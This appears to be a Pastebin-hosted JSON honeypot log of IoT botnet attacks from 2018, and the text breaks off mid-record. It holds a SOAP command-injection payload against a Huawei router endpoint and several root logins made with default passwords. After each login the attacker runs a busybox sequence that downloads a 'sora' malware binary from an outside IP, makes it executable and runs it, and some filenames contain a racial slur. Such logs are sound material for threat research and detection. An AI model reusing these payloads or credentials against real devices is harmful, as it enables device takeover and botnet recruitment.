Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- {
- "datas": [
- {
- "@timestamp": "2018-09-30T02:26:31.000Z",
- "data": "POST /ws/v1/cluster/apps/new-application HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nContent-Length: 0\r\nUser-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.el6.x86_64\r\nConnection: keep-alive\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n\r\n"
- },
- {
- "@timestamp": "2018-09-20T23:03:32.000Z",
- "data": "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: 127.0.0.1:37215\r\nContent-Length: 478\r\nUser-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.3.5.el6.x86_64\r\nConnection: keep-alive\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n\r\n\u003c?xml version=\"1.0\" ?\u003e\n \u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\n \u003cs:Body\u003e\u003cu:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"\u003e\n \u003cNewStatusURL\u003e$(busybox wget -g 209.141.34.89 -l /tmp/scarface -r /bins/sora.mips ;chmod +x /tmp/scarface ;/tmp/scarface huawei)\u003c/NewStatusURL\u003e\n\u003cNewDownloadURL\u003e$(echo HUAWEIUPNP)\u003c/NewDownloadURL\u003e\n\u003c/u:Upgrade\u003e\n \u003c/s:Body\u003e\n \u003c/s:Envelope\u003e"
- },
- {
- "@timestamp": "2018-09-20T18:43:03.000Z",
- "data": "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: 127.0.0.1:37215\r\nContent-Length: 478\r\nUser-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.3.5.el6.x86_64\r\nConnection: keep-alive\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n\r\n\u003c?xml version=\"1.0\" ?\u003e\n \u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\n \u003cs:Body\u003e\u003cu:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"\u003e\n \u003cNewStatusURL\u003e$(busybox wget -g 209.141.34.89 -l /tmp/scarface -r /bins/sora.mips ;chmod +x /tmp/scarface ;/tmp/scarface huawei)\u003c/NewStatusURL\u003e\n\u003cNewDownloadURL\u003e$(echo HUAWEIUPNP)\u003c/NewDownloadURL\u003e\n\u003c/u:Upgrade\u003e\n \u003c/s:Body\u003e\n \u003c/s:Envelope\u003e"
- }
- ],
- "inputs": {
- "04351c08ad6d": [
- {
- "@timestamp": "2018-09-15T04:21:19.755Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:21:19.663Z",
- "eventid": "command.input",
- "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
- },
- {
- "@timestamp": "2018-09-15T04:21:19.301Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:21:19.202Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:21:19.112Z",
- "eventid": "command.input",
- "input": "/bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:21:19.011Z",
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
- },
- {
- "@timestamp": "2018-09-15T04:21:18.902Z",
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:21:18.892Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
- },
- {
- "@timestamp": "2018-09-15T04:21:18.890Z",
- "eventid": "command.input",
- "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
- },
- {
- "@timestamp": "2018-09-15T04:21:18.883Z",
- "eventid": "command.input",
- "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
- },
- {
- "@timestamp": "2018-09-15T04:21:18.881Z",
- "eventid": "command.input",
- "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
- },
- {
- "@timestamp": "2018-09-15T04:21:18.873Z",
- "eventid": "command.input",
- "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
- },
- {
- "@timestamp": "2018-09-15T04:21:18.871Z",
- "eventid": "command.input",
- "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
- },
- {
- "@timestamp": "2018-09-15T04:21:18.863Z",
- "eventid": "command.input",
- "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
- },
- {
- "@timestamp": "2018-09-15T04:21:18.861Z",
- "eventid": "command.input",
- "input": "\u003e/.ptmx \u0026\u0026 cd /"
- },
- {
- "@timestamp": "2018-09-15T04:21:18.859Z",
- "eventid": "command.input",
- "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:21:18.858Z",
- "eventid": "command.input",
- "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
- },
- {
- "@timestamp": "2018-09-15T04:21:18.848Z",
- "eventid": "command.input",
- "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
- },
- {
- "@timestamp": "2018-09-15T04:21:18.846Z",
- "eventid": "command.input",
- "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
- },
- {
- "@timestamp": "2018-09-15T04:21:18.845Z",
- "eventid": "command.input",
- "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
- },
- {
- "@timestamp": "2018-09-15T04:21:18.837Z",
- "eventid": "command.input",
- "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:21:18.834Z",
- "eventid": "command.input",
- "input": "sh"
- },
- {
- "@timestamp": "2018-09-15T04:21:18.832Z",
- "eventid": "command.input",
- "input": "shell"
- },
- {
- "@timestamp": "2018-09-15T04:21:18.829Z",
- "eventid": "command.input",
- "input": "system"
- },
- {
- "@timestamp": "2018-09-15T04:21:18.741Z",
- "eventid": "command.input",
- "input": "enable"
- },
- {
- "@timestamp": "2018-09-15T04:21:18.652Z",
- "eventid": "command.input",
- "input": ""
- },
- {
- "@timestamp": "2018-09-15T04:21:17.039Z",
- "eventid": "login.success",
- "geoip": {
- "city_name": "Las Vegas",
- "country_name": "United States"
- },
- "password": "admin",
- "username": "root"
- }
- ],
- "11793e449a70": [
- {
- "@timestamp": "2018-09-15T04:12:40.539Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.488Z",
- "eventid": "command.input",
- "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
- },
- {
- "@timestamp": "2018-09-15T04:12:40.265Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:39.639Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:39.294Z",
- "eventid": "command.input",
- "input": "/bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:39.238Z",
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
- },
- {
- "@timestamp": "2018-09-15T04:12:38.409Z",
- "eventid": "login.success",
- "geoip": {
- "city_name": "Las Vegas",
- "country_name": "United States"
- },
- "password": "root",
- "username": "root"
- }
- ],
- "1fa9946460a3": [
- {
- "@timestamp": "2018-09-15T04:14:17.149Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:14:17.103Z",
- "eventid": "command.input",
- "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.925Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.875Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.829Z",
- "eventid": "command.input",
- "input": "/bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.778Z",
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.696Z",
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.691Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.689Z",
- "eventid": "command.input",
- "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.687Z",
- "eventid": "command.input",
- "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.685Z",
- "eventid": "command.input",
- "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.683Z",
- "eventid": "command.input",
- "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.681Z",
- "eventid": "command.input",
- "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.679Z",
- "eventid": "command.input",
- "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.677Z",
- "eventid": "command.input",
- "input": "\u003e/.ptmx \u0026\u0026 cd /"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.675Z",
- "eventid": "command.input",
- "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.673Z",
- "eventid": "command.input",
- "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.670Z",
- "eventid": "command.input",
- "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.668Z",
- "eventid": "command.input",
- "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.666Z",
- "eventid": "command.input",
- "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.664Z",
- "eventid": "command.input",
- "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.662Z",
- "eventid": "command.input",
- "input": "sh"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.659Z",
- "eventid": "command.input",
- "input": "shell"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.656Z",
- "eventid": "command.input",
- "input": "system"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.614Z",
- "eventid": "command.input",
- "input": "enable"
- },
- {
- "@timestamp": "2018-09-15T04:14:16.570Z",
- "eventid": "command.input",
- "input": ""
- },
- {
- "@timestamp": "2018-09-15T04:14:16.297Z",
- "eventid": "login.success",
- "geoip": {
- "city_name": "Las Vegas",
- "country_name": "United States"
- },
- "password": "admin",
- "username": "root"
- }
- ],
- "202447413b56": [
- {
- "@timestamp": "2018-09-15T04:12:49.426Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:49.382Z",
- "eventid": "command.input",
- "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
- },
- {
- "@timestamp": "2018-09-15T04:12:49.205Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:49.157Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:49.113Z",
- "eventid": "command.input",
- "input": "/bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:49.063Z",
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
- },
- {
- "@timestamp": "2018-09-15T04:12:49.014Z",
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:49.011Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
- },
- {
- "@timestamp": "2018-09-15T04:12:49.009Z",
- "eventid": "command.input",
- "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
- },
- {
- "@timestamp": "2018-09-15T04:12:49.007Z",
- "eventid": "command.input",
- "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
- },
- {
- "@timestamp": "2018-09-15T04:12:49.004Z",
- "eventid": "command.input",
- "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
- },
- {
- "@timestamp": "2018-09-15T04:12:49.002Z",
- "eventid": "command.input",
- "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
- },
- {
- "@timestamp": "2018-09-15T04:12:49.000Z",
- "eventid": "command.input",
- "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
- },
- {
- "@timestamp": "2018-09-15T04:12:48.998Z",
- "eventid": "command.input",
- "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
- },
- {
- "@timestamp": "2018-09-15T04:12:48.996Z",
- "eventid": "command.input",
- "input": "\u003e/.ptmx \u0026\u0026 cd /"
- },
- {
- "@timestamp": "2018-09-15T04:12:48.994Z",
- "eventid": "command.input",
- "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:12:48.992Z",
- "eventid": "command.input",
- "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
- },
- {
- "@timestamp": "2018-09-15T04:12:48.990Z",
- "eventid": "command.input",
- "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
- },
- {
- "@timestamp": "2018-09-15T04:12:48.988Z",
- "eventid": "command.input",
- "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
- },
- {
- "@timestamp": "2018-09-15T04:12:48.986Z",
- "eventid": "command.input",
- "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
- },
- {
- "@timestamp": "2018-09-15T04:12:48.984Z",
- "eventid": "command.input",
- "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:12:48.981Z",
- "eventid": "command.input",
- "input": "sh"
- },
- {
- "@timestamp": "2018-09-15T04:12:48.979Z",
- "eventid": "command.input",
- "input": "shell"
- },
- {
- "@timestamp": "2018-09-15T04:12:48.976Z",
- "eventid": "command.input",
- "input": "system"
- },
- {
- "@timestamp": "2018-09-15T04:12:48.935Z",
- "eventid": "command.input",
- "input": "enable"
- },
- {
- "@timestamp": "2018-09-15T04:12:48.892Z",
- "eventid": "command.input",
- "input": ""
- },
- {
- "@timestamp": "2018-09-15T04:12:48.615Z",
- "eventid": "login.success",
- "geoip": {
- "city_name": "Las Vegas",
- "country_name": "United States"
- },
- "password": "default",
- "username": "root"
- }
- ],
- "25b69393953d": [
- {
- "@timestamp": "2018-09-15T04:17:54.442Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:17:54.351Z",
- "eventid": "command.input",
- "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.986Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.884Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.740Z",
- "eventid": "command.input",
- "input": "/bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.652Z",
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.546Z",
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.538Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.536Z",
- "eventid": "command.input",
- "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.534Z",
- "eventid": "command.input",
- "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.527Z",
- "eventid": "command.input",
- "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.526Z",
- "eventid": "command.input",
- "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.518Z",
- "eventid": "command.input",
- "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.517Z",
- "eventid": "command.input",
- "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.515Z",
- "eventid": "command.input",
- "input": "\u003e/.ptmx \u0026\u0026 cd /"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.508Z",
- "eventid": "command.input",
- "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.506Z",
- "eventid": "command.input",
- "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.497Z",
- "eventid": "command.input",
- "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.496Z",
- "eventid": "command.input",
- "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.489Z",
- "eventid": "command.input",
- "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.487Z",
- "eventid": "command.input",
- "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.486Z",
- "eventid": "command.input",
- "input": "sh"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.478Z",
- "eventid": "command.input",
- "input": "shell"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.477Z",
- "eventid": "command.input",
- "input": "system"
- },
- {
- "@timestamp": "2018-09-15T04:17:53.475Z",
- "eventid": "command.input",
- "input": "enable"
- },
- {
- "@timestamp": "2018-09-15T04:17:52.676Z",
- "eventid": "command.input",
- "input": ""
- },
- {
- "@timestamp": "2018-09-15T04:17:51.781Z",
- "eventid": "login.success",
- "geoip": {
- "city_name": "Las Vegas",
- "country_name": "United States"
- },
- "password": "vizxv",
- "username": "root"
- }
- ],
- "2b113c9c5c08": [
- {
- "@timestamp": "2018-09-15T04:12:46.879Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.787Z",
- "eventid": "command.input",
- "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.425Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.325Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.173Z",
- "eventid": "command.input",
- "input": "/bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:46.088Z",
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
- },
- {
- "@timestamp": "2018-09-15T04:12:45.980Z",
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:12:45.977Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
- },
- {
- "@timestamp": "2018-09-15T04:12:45.969Z",
- "eventid": "command.input",
- "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
- },
- {
- "@timestamp": "2018-09-15T04:12:45.967Z",
- "eventid": "command.input",
- "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
- },
- {
- "@timestamp": "2018-09-15T04:12:45.959Z",
- "eventid": "command.input",
- "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
- },
- {
- "@timestamp": "2018-09-15T04:12:45.958Z",
- "eventid": "command.input",
- "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
- },
- {
- "@timestamp": "2018-09-15T04:12:45.950Z",
- "eventid": "command.input",
- "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
- },
- {
- "@timestamp": "2018-09-15T04:12:45.948Z",
- "eventid": "command.input",
- "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
- },
- {
- "@timestamp": "2018-09-15T04:12:45.940Z",
- "eventid": "command.input",
- "input": "\u003e/.ptmx \u0026\u0026 cd /"
- },
- {
- "@timestamp": "2018-09-15T04:12:45.939Z",
- "eventid": "command.input",
- "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:12:45.937Z",
- "eventid": "command.input",
- "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
- },
- {
- "@timestamp": "2018-09-15T04:12:45.930Z",
- "eventid": "command.input",
- "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
- },
- {
- "@timestamp": "2018-09-15T04:12:45.928Z",
- "eventid": "command.input",
- "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
- },
- {
- "@timestamp": "2018-09-15T04:12:45.920Z",
- "eventid": "command.input",
- "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
- },
- {
- "@timestamp": "2018-09-15T04:12:45.918Z",
- "eventid": "command.input",
- "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:12:45.917Z",
- "eventid": "command.input",
- "input": "sh"
- },
- {
- "@timestamp": "2018-09-15T04:12:45.909Z",
- "eventid": "command.input",
- "input": "shell"
- },
- {
- "@timestamp": "2018-09-15T04:12:45.901Z",
- "eventid": "command.input",
- "input": "system"
- },
- {
- "@timestamp": "2018-09-15T04:12:45.899Z",
- "eventid": "command.input",
- "input": "enable"
- },
- {
- "@timestamp": "2018-09-15T04:12:45.071Z",
- "eventid": "command.input",
- "input": ""
- },
- {
- "@timestamp": "2018-09-15T04:12:43.528Z",
- "eventid": "login.success",
- "geoip": {
- "city_name": "Las Vegas",
- "country_name": "United States"
- },
- "password": "t0talc0ntr0l4!",
- "username": "root"
- }
- ],
- "335fbc5279c3": [
- {
- "@timestamp": "2018-09-15T04:13:04.193Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:04.148Z",
- "eventid": "command.input",
- "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.965Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.478Z",
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.388Z",
- "eventid": "command.input",
- "input": "/bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.347Z",
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.298Z",
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.295Z",
- "eventid": "command.input",
- "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.292Z",
- "eventid": "command.input",
- "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.290Z",
- "eventid": "command.input",
- "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.288Z",
- "eventid": "command.input",
- "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.286Z",
- "eventid": "command.input",
- "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.284Z",
- "eventid": "command.input",
- "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.281Z",
- "eventid": "command.input",
- "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.279Z",
- "eventid": "command.input",
- "input": "\u003e/.ptmx \u0026\u0026 cd /"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.277Z",
- "eventid": "command.input",
- "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.275Z",
- "eventid": "command.input",
- "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.273Z",
- "eventid": "command.input",
- "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.271Z",
- "eventid": "command.input",
- "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.269Z",
- "eventid": "command.input",
- "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.267Z",
- "eventid": "command.input",
- "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.265Z",
- "eventid": "command.input",
- "input": "sh"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.262Z",
- "eventid": "command.input",
- "input": "shell"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.259Z",
- "eventid": "command.input",
- "input": "system"
- },
- {
- "@timestamp": "2018-09-15T04:13:03.217Z",
